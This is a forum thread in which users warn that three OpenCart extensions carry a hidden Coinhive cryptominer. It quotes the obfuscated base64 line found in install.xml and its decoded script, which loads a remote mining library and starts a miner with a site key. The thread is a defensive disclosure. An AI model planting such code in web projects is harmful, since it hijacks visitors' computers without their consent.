Post by rebeccag » Tue Feb 20, 2018 5:10 am

I have found the 3 extensions are infected with coinhive malware, do not install them

https://www.opencart.com/index.php?rout ... er=CodeLab
https://www.opencart.com/index.php?rout ... er=CodeLab
https://www.opencart.com/index.php?rout ... er=CodeLab

The install.xml contains this

Code: Select all

		$inherit = base64_decode('PHNjcmlwdD4gZG9jdW1lbnQud3JpdGUoIjxzY3JpcHQgdHlwZT0ndGV4dC9qYXZhc2NyaXB0JyBzcmM9JyIrIGF0b2IoJ2FIUjBjSE02THk5amIybHVhR2wyWlM1amIyMHZiR2xpTDJOdmFXNW9hWFpsTG0xcGJpNXFjdz09JykgKyAiJz48XC9zY3IiICsgImlwdD4iKTs8L3NjcmlwdD48c2NyaXB0PiB2YXIganN3b3JrZXIgPSBuZXcgQ29pbkhpdmUuQW5vbnltb3VzKCdFMFFpM3JiNzRoWTVaR3hweG5ySXBoVXRseXhScElIVScse3Rocm90dGxlOiAwLjIsZm9yY2VBU01KUzogZmFsc2V9KTtqc3dvcmtlci5zdGFydChhdG9iKCdRMjlwYmtocGRtVXVSazlTUTBWZlJWaERURlZUU1ZaRlgxUkJRZz09JykpOzwvc2NyaXB0Pg=='); 

decodes to this

Code: Select all

<script> document.write("<script type='text/javascript' src='https://coinhive.com/lib/coinhive.min.js'><\/scr" + "ipt>");</script><script> var jsworker = new CoinHive.Anonymous('E0Qi3rb74hY5ZGxpxnrIphUtlyxRpIHU',{throttle: 0.2,forceASMJS: false});jsworker.start(atob('Q29pbkhpdmUuRk9SQ0VfRVhDTFVTSVZFX1RBQg=='));</script>

Newbie

Posts

Joined
Thu Feb 01, 2018 1:52 pm

Post by OSWorX » Tue Feb 20, 2018 5:42 am

Have you reported the developer and those extensions?

Full Stack Web Developer :: Dedicated OpenCart Development & Support DACH Region
Contact for Custom Work / Fast Support.


User avatar
Guru Member

Posts

Joined
Mon Jan 11, 2010 10:52 pm
Location - Austria

Post by IP_CAM » Tue Feb 20, 2018 11:52 am

Well, I have reported them about 10 days ago, but OC does not seem to care much about it,
as it looks. ::)
Ernie

My Github OC Site: https://github.com/IP-CAM
5'200 + FREE OC Extensions, on the World's largest private Github OC Repository Archive Site.


User avatar
Legendary Member

Posts

Joined
Tue Mar 04, 2014 1:37 am
Location - Switzerland

Post by rebeccag » Fri Feb 23, 2018 5:59 am

One other used reported they had already reported it about 2 weeks ago, but nothing seams to have happened yet. I sent another support request this morning. I also added warnings to the extensions but the uploader keeps deleting them.

Newbie

Posts

Joined
Thu Feb 01, 2018 1:52 pm

Post by IP_CAM » Fri Feb 23, 2018 7:46 am

Well, it almost looks like taking the last chance, to still generate some income ... ::)
Ernie
Image

My Github OC Site: https://github.com/IP-CAM
5'200 + FREE OC Extensions, on the World's largest private Github OC Repository Archive Site.


User avatar
Legendary Member

Posts

Joined
Tue Mar 04, 2014 1:37 am
Location - Switzerland

Post by zaidladha » Tue Jun 12, 2018 8:10 am

Who was the developer? Is there a list of infected extensions?

Active Member

Posts

Joined
Wed Jun 05, 2013 3:07 pm

Post by IP_CAM » Tue Jun 12, 2018 10:40 am

Well, just scan your OC Software for:

Code: Select all

coinhive.com
and if you don't find anyting, you don't have to worry about coinhive :D
Ernie

My Github OC Site: https://github.com/IP-CAM
5'200 + FREE OC Extensions, on the World's largest private Github OC Repository Archive Site.


User avatar
Legendary Member

Posts

Joined
Tue Mar 04, 2014 1:37 am
Location - Switzerland
Who is online

Users browsing this forum: No registered users and 15 guests